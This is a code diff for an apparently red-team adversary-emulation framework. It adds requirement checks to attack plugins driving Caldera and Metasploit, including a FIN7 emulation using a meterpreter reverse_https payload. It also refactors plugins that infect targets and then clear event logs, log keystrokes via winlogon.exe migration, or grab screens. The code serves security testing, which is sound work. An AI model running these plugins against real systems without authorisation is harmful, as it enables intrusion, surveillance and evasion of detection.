diff --git a/plugins/base/attack.py b/plugins/base/attack.py index e9f18c3..0533a12 100644 --- a/plugins/base/attack.py +++ b/plugins/base/attack.py @@ -3,11 +3,19 @@ import os from plugins.base.plugin_base import BasePlugin -from app.exceptions import PluginError, ConfigurationError +from app.exceptions import PluginError, ConfigurationError, RequirementError from app.calderacontrol import CalderaControl # from app.metasploit import MSFVenom, Metasploit from typing import Optional from plugins.base.machinery import MachineryPlugin +from app.metasploit import MetasploitInstant +from enum import Enum + + +class Requirement(Enum): + """ Requirements for this plugin """ + METASPLOIT = 1 + CALDERA = 2 class AttackPlugin(BasePlugin): @@ -23,6 +31,8 @@ class AttackPlugin(BasePlugin): required_files_attacker: list[str] = [] # a list of files to automatically install to the attacker required_files_target: list[str] = [] # a list of files to automatically copy to the targets + requirements: Optional[list[Requirement]] = [] # Requirements to run this plugin + # TODO: parse results def __init__(self): @@ -38,6 +48,25 @@ class AttackPlugin(BasePlugin): self.metasploit_user: str = "user" self.metasploit = None + def needs_caldera(self) -> bool: + """ Returns True if this plugin has Caldera in the requirements """ + if Requirement.CALDERA in self.requirements: + return True + return False + + def needs_metasploit(self) -> bool: + """ Returns True if this plugin has Metasploit in the requirements """ + if Requirement.METASPLOIT in self.requirements: + return True + return False + + def connect_metasploit(self): + """ Inits metasploit """ + + if self.needs_metasploit(): + self.metasploit = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user) + # If metasploit requirements are not set, self.metasploit stay None and using metasploit from a plugin not having the requirements will trigger an exception + def copy_to_attacker_and_defender(self): """ Copy attacker/defender specific files to the machines. Called by setup, do not call it yourself. template processing happens before """ @@ -103,7 +132,9 @@ class AttackPlugin(BasePlugin): @param caldera: The caldera object to connect through """ - self.caldera = caldera + + if self.needs_caldera(): + self.caldera = caldera def caldera_attack(self, target: MachineryPlugin, ability_id: str, parameters=None, **kwargs): """ Attack a single target using caldera @@ -113,6 +144,9 @@ class AttackPlugin(BasePlugin): @param parameters: parameters to pass to the ability """ + if not self.needs_caldera(): + raise RequirementError("Caldera not in requirements") + self.caldera.attack(paw=target.get_paw(), ability_id=ability_id, group=target.get_group(), diff --git a/plugins/default/adversary_emulations/FIN7/fin7_section1.py b/plugins/default/adversary_emulations/FIN7/fin7_section1.py index e035b3e..cd6f845 100644 --- a/plugins/default/adversary_emulations/FIN7/fin7_section1.py +++ b/plugins/default/adversary_emulations/FIN7/fin7_section1.py @@ -3,7 +3,7 @@ # Adversary emulation for FIN7 import socket -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.interface_sfx import CommandlineColors from app.metasploit import MSFVenom, MetasploitInstant import os @@ -20,6 +20,8 @@ class FIN7Plugin(AttackPlugin): required_files_attacker = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.CALDERA, Requirement.METASPLOIT] + ###### payload_type_1 = "windows/x64/meterpreter/reverse_https" # payload for initial stage @@ -33,14 +35,15 @@ class FIN7Plugin(AttackPlugin): @param payload: payload description. waiting for this payload. Like "windows/x64/meterpreter/reverse_https" """ - if self.metasploit_1: - return self.metasploit_1 + if self.metasploit: + return self.metasploit + + self.connect_metasploit() - self.metasploit_1 = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user) ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) - self.metasploit_1.start_exploit_stub_for_external_payload(payload=self.payload_type_1, lhost=ip) - self.metasploit_1.wait_for_session() - return self.metasploit_1 + self.metasploit.start_exploit_stub_for_external_payload(payload=self.payload_type_1, lhost=ip) + self.metasploit.wait_for_session() + return self.metasploit def step1(self): self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Step 1 (target hotelmanager): Initial Breach{CommandlineColors.ENDC}", 1) diff --git a/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py b/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py index 7c33e73..9ef0b5f 100644 --- a/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py +++ b/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py @@ -38,7 +38,8 @@ class MetasploitClearevPlugin(AttackPlugin): metasploit.smart_infect(target, payload=payload_type, - payload_name=payload_name, + outfile=payload_name, + format="exe", architecture="x64") metasploit.clearev(target) diff --git a/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py b/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py index eaaef44..3007ccb 100644 --- a/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py +++ b/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py @@ -38,7 +38,8 @@ class MetasploitGetuidPlugin(AttackPlugin): metasploit.smart_infect(target, payload=payload_type, - payload_name=payload_name, + outfile=payload_name, + format="exe", architecture="x64") uid = metasploit.getuid(target) diff --git a/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py b/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py index f4b12f3..0907804 100644 --- a/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py +++ b/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py @@ -38,7 +38,8 @@ class MetasploitKeyloggingPlugin(AttackPlugin): metasploit.smart_infect(target, payload=payload_type, - payload_name=payload_name, + outfile=payload_name, + format="exe", architecture="x64") metasploit.migrate(target, name="winlogon.exe") diff --git a/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py b/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py index 5772f83..bef5798 100644 --- a/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py +++ b/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py @@ -38,7 +38,8 @@ class MetasploitPsPlugin(AttackPlugin): metasploit.smart_infect(target, payload=payload_type, - payload_name=payload_name, + outfile=payload_name, + format="exe", architecture="x64") metasploit.ps_process_discovery(target) diff --git a/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py b/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py index c48fcdb..a1856e6 100644 --- a/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py +++ b/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py @@ -38,7 +38,8 @@ class MetasploitScreengrabPlugin(AttackPlugin): metasploit.smart_infect(target, payload=payload_type, - payload_name=payload_name, + outfile=payload_name, + format="exe", architecture="x64") metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM") diff --git a/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py b/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py index 1740af6..29ff19f 100644 --- a/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py +++ b/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py @@ -38,8 +38,9 @@ class MetasploitSysinfoPlugin(AttackPlugin): metasploit.smart_infect(target, payload=payload_type, - payload_name=payload_name, - architecture="x86") + outfile=payload_name, + format="exe", + architecture="x64") si = metasploit.sysinfo(target) print(f"Sysinfo: {si}")